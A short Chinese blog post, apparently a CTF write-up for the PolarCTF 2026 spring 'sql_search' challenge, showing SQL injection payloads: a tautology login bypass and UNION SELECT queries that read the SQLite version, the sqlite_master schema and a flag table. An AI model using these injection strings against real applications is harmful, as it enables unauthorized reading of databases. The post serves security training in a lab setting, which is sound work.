【PolarCTF2026年春季挑战赛】sql_search

大方子2026-03-28 9:17

输入框很明显的SQL注入

使用下语句进行注入

复制代码 
' or '1'='1

通过order by 语句,知道有3列

2和3字段有回显

查询sqlite版本

复制代码 
' union select 1,2,sqlite_version()-- -

查询sqlite数据表

复制代码 
' union select 1,2,sql from sqlite_master-- -

发现有flaggggggggggg表,接下来查询得到flag

复制代码 
' union select 1,2,flag from flaggggggggggg-- -
相关推荐
谪星·阿凯6 小时前
内网隧道与代理实战博客
网络安全
梧六柒10 小时前
2-文件类型绕过
网络安全
2301_7807896611 小时前
“数字珍珠港”再现:西北能源基地DNS篡改事件深度复盘与防护升级
运维·服务器·网络·tcp/ip·网络安全·智能路由器·能源
柠檬威士忌98516 小时前
2026-05-12 AI前沿日报:GPT-5.5-Cyber、预发布评测与AI科研加速
网络安全·大模型·openai·deepmind
m0_7381207218 小时前
ctfshow靶场SSRF部分——基础绕过到协议攻击解题思路与技巧(二)
python·网络协议·tcp/ip·安全·网络安全
Ogcloud_oversea19 小时前
SD-WAN 技术架构解析:控制平面与数据平面的解耦实践
运维·网络·网络协议·网络安全·信息与通信
small_white_robot19 小时前
idek-2022 web 全wp——持续更新
开发语言·前端·javascript·网络·安全·web安全·网络安全
梧六柒21 小时前
3 || 4-黑名单绕过
网络安全
路baby1 天前
CSRF漏洞详细讲解 并基于pikachu靶场实战演示
网络·网络协议·安全·web安全·网络安全·网络攻击模型·csrf
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03CC-Switch & Claude 基于 Linux 服务器安装使用指南04【AI】2026 年具身智能模型和世界模型总结05零基础教你claude code 接入 deepseek V406Cursor 接入 DeepSeek‑V4‑Pro 完整指南(2026 实测)07codex app每次打开重连5次Reconnecting问题解决08Windows端Codex接入第三方模型(DeekSeek,BaiLian)09要裂开了!ChatGPT要手机号验证了?注册Codex要求验证电话号码怎么办?2026年登陆Codex要手机号验证的解决办法10裂开!ChatGPT 居然开始要手机号验证,附详细解决方法